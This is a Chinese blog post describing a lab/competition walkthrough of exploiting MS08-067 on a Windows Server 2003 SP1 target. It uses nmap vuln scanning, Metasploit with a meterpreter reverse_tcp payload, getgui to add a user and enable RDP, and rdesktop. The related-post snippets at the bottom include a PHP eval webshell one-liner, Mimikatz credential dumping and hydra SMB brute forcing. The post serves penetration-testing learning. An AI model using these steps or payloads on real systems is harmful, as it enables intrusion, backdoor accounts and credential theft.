Metasploit渗透winserv 2003 sp1

最新推荐文章于 2024-01-31 17:04:31 发布
最新推荐文章于 2024-01-31 17:04:31 发布
阅读量2.2k 收藏 9
点赞数 1
分类专栏: Metasploit使用 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35817356/article/details/80099256
版权

今天因为比赛的原因写一个关于MS08_067的渗透文章,网上已经有很多前辈写过关于MS08_067的文章,非常的好,我也看了很多的文章,对我启发很大。话不多说!开始我今天做题用到的主角MS08_067。

首先我们要先安装好Kali linux  这个在座的肯定比我要熟,对里面的工具,命令已经很透彻了。

我们先对目标靶机进行信息收集,就用到了Nmap这个工具

我使用的参数是 -O 扫描系统版本信息、 -sV 是系统服务及版本信息、 --script=vuln 是使用脚本扫描,vuln是检查目标主机是否存在已知漏洞(例如:ms08_067)

扫描结束了,我们来看看结果

因为我这个之前做个实验,开启过3389 ,不过不会影响下面的操作的。

使用脚本扫描也扫描出来了结果,

常见漏洞有ms08-067、还有去年比较火的ms17-010。我们这里只需要用到我们的主角ms08-067。

然后我们调用Metasploit,在里面使用ms08_067

它会开始加载,第一次可能比较慢,耐心等待就好啦orz

 

终于进入了这个界面

我们需要用到ms08_067这个攻击载荷

我们快速搜索,使用search命令

搜索到路径文件。

我们使用use命令使用这个模块

进入后,我们查看一下需要设置的参数:show options

我们需要设置一下目标靶机IP地址:set RHOST 192.168.43.215

我的靶机是winserv2003 SP1 。

可以使用tab键进行补全。

仅此还是不够的,还需要设置payload。

我这里使用的是:windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp

设置完成payload以后,我们在使用show options 查看一下需要配置的参数

多了一个LHOST 我们这时候输入自己kali本机ip地址:set LHOST 192.168.43.27(在这个地方使用tab键可以自动补全ip地址)

设置完成后,我们可以用exploit进行攻击测试。

现在给我们返回了一个meterpreter的对话框,我们可以在这里进行一些系统级别的操作。

我这里使用的是: run getgui -u CSND -p 123456

相信大家一定也知道我这条命令的用法, -u 是创建用户“CSDN” -p是设置密码“123456”

在以往的渗透中,一些人拿到了meterpreter的时候都会shell进入cmd,输入一大堆的命令去开启3389,命令太长,不愿意去记住,使用getgui 就可以轻松开始3389,让我们来看一下吧!

命令:run getgui -e

从反馈的信息来看,远程桌面已经准备好,RDP也已经启用,我们就可以确定3389已经开启。

这时候我们就可以使用万能的Kali linux 进行远程桌面连接了。

命令如下

rdesktop 192.168.43.215 

这个工具可以让我们像在windows下一样连接远程桌面,非常的好用。

输入这时候我们前面设置的用户名和密码

进行登录。

成功进入了桌面,我们就可以做自己想做的事情了,emmm!意味着我要开始做题了。

这篇博客还有一些地方写的不好,时间原因也没有及时进行改进,请各位谅解

本人小白,各位大佬看了勿喷,希望大佬能多多指点我一下。

本人QQ:MTYyNzIzODc3NA

喜欢渗透的朋友可以加我qq一起交流一下,好东西还是要分享的

呆比のE4
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
入侵Windows server 2003 测试
Tham 在思索中前行!
12-04 1万+
1.         勘察主机 首先需要发现收集目标更多的信息,其中包括: l         目标网络上主机的IP地址 l         目标系统上可访问的TCP和UDP端口 l         目标系统上使用的操作系统 使用Nmap对主机进行端口扫描和系统识别,如图所示:   可以看到主机开放了80、135、139、1025、
Metasploit中使用Mimikatz抓取内存中的Windows密码
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
08-24 1617
我是通过这个漏洞学习内存抓取Windows密码的 首先你需要提升Shell权限为System 加载mimikatz模块 load mimikatz 三种获取密码方法 一、可以抓取到当前所有登录用户的明文密码(推荐使用) kerberos 二、只可显示HASH(显示所有用户密码HASH) mimikatz_command -f samdump::hashes 三、只能显示当前登录的用户加密后的密码 ...
win2003遭受udp攻击导致带宽占用很大
weixin_33995481的博客
09-11 239
2019独角兽企业重金招聘Python工程师标准>>> ...
Kali渗透Windows Server 2003
xiaopan233的博客
11-12 7893
两台虚拟机 kali ip 192.168.18.128 windows ip 192.168.18.133 1)首先先扫描一下靶机 nmap -sS -sV -O -Pn 192.168.18.133 其中sS是半开放扫描,sV是扫描版本号,O是扫描操作系统,Pn是不进行ping,会快一点。 可以看到有445端口,且是windows server 2003。 2)使用msfco...
window 2003靶机 --- DVWA(上传小马)
天威一号
10-31 657
在靶机中查到 IP地址,然后在本地浏览器中输入查到的IP地址,进行试验; 一句话木马:<?php @eval($_POST['v']);?> post可换成get 第一个 在桌面创建一个 .php 文件; 上传成功后,将下面得到的地址替换上面DVMA后面的地址; 得到空白网址,按F12在hackbar中进行post传参, 输入 v=system(“config”)...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
windows server 2003 系统提权
08-09
windows server 2003 系统提权 课程名称:《系统提权》 【要求】 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试; 对MS03_026漏洞开启远程桌面服务; 操作过程可自由发挥; 概念越详细越好; 渗透和验证过程必要有截图和文字说明; 其余部分均可配文字简介叙述; 作业模板在此基础上可以自由发挥设计; 熟悉虚拟机的使用,了解渗透测试工具的使用方法和Linux、DOS命令
记某windows server2003靶场渗透(一)
Redredredfish的博客
10-08 1546
今天从同事那里搞来一个windows server2003靶场,据说是有域环境,最近也在逐步接触内网和后渗透。 镜像比较大,先看看web服务器,试试能不能webshell。 大致就是192.168.31.197有一些web服务,可以从这些地方突破 上nmap 扫到81和8080端口 先看一下81 一个远古版本的web页面 再看看8080 好家伙直接tomcat,访问一下/manager/html 需要身份认证,手工枚举几个 祖传的admin成功登录,试试能不能传war包,jar cvf 打包冰蝎.
靶机windows-2003搭建asp网站操作步骤
边城浪子的博客
12-06 1130
本实验为2019黑客入门基础windows网络安全精讲里面的内容,为搭建ASP网站步骤,以及可能出现的问题。 step1:开启IIS管理器,点”开始“----”管理工具“----”信息服务管理器“ step2:新建网站,右键”网站“----”新建“----”网站“,一步步按照创建向导来设置,如下图。 按需配置选项。 step3:设置默认内容文档。 右键刚设置的网站...
利用msf 对靶机metasploittable2 进行信息收集
枫梓林のBlog
04-20 1350
利用msf 对靶机metasploittable2 进行信息收集 文章目录利用msf 对靶机metasploittable2 进行信息收集测试环境信息统一收集1.使用netdiscover 扫描存活主机2.使用 Nmap 确认该目标主机3.使用zenmap 扫描开放端口 查找漏洞4.如上图这么多端口开放使用 Nessus 扫描该主机的漏洞一、基于 TCP 协议收集主机信息1.1 ARP 扫描1.2 使用半连接方式扫描TCP端口1.3 使用 auxiliary/sniffer 下的psnuffle 模块进行密
记一次某竞赛中的渗透测试Windows Server 2003靶机漏洞)
最新发布
m0_73734159的博客
01-31 1945
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
使用kali下的msf对windows 2003进行测试
Amdy_amdy的博客
07-02 2588
使用kali下的msf对windows 2003进行测试 测试环境: windows 2003 192.168.145.132 kali: 192.168.145.146 使用kali查看windows2003下开放的端口以及对应端口是否存在漏洞: nmap --script=vuln 192.168.145.132 root@kali:~# nmap --script=vuln ...
使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程
D-river博客
10-11 9490
metasploit比较经典的使用实例,ms08-067 netapi
Kali linux利用(ms17-010)漏洞入侵Windows server 2003
王先生的蒋小姐的博客
04-02 7294
NMAP MSF实现对目标系统渗透Windows server 2003控制) Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。 此次采用kali Linux系统集成的metasploit进行测试验证MS17-010(永恒之蓝,著名比特币勒索漏洞)。实验环境均采用虚拟机。 前提准备: Kali linux: 192.168.1.113 ...
使用kali hydra暴力 破解Windows2003密码
qBAYMAX的博客
03-17 1589
模拟机:kali windows2003 两台虚拟机能ping通 1.在windows2003创建用户和密码 2.在kali测试两台模拟机的连通性 3.创建字典 使用crunch创建字典 4.扫描端口,由开放的端口决定由什么协议·进行攻击 smb:445端口 5.发起攻击 hydra -l baymax -P pass.txt smb://192.168.171.128 -l 攻击的用...
Metasploit渗透测试实战指南
"Metasploit渗透测试指南中文版" Metasploit是网络安全领域中的一款强大工具,主要用于渗透测试和安全漏洞的研究。《Metasploit渗透测试指南》是一本深入讲解该平台的专业书籍,由David Kennedy、Jim O’Gorman、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值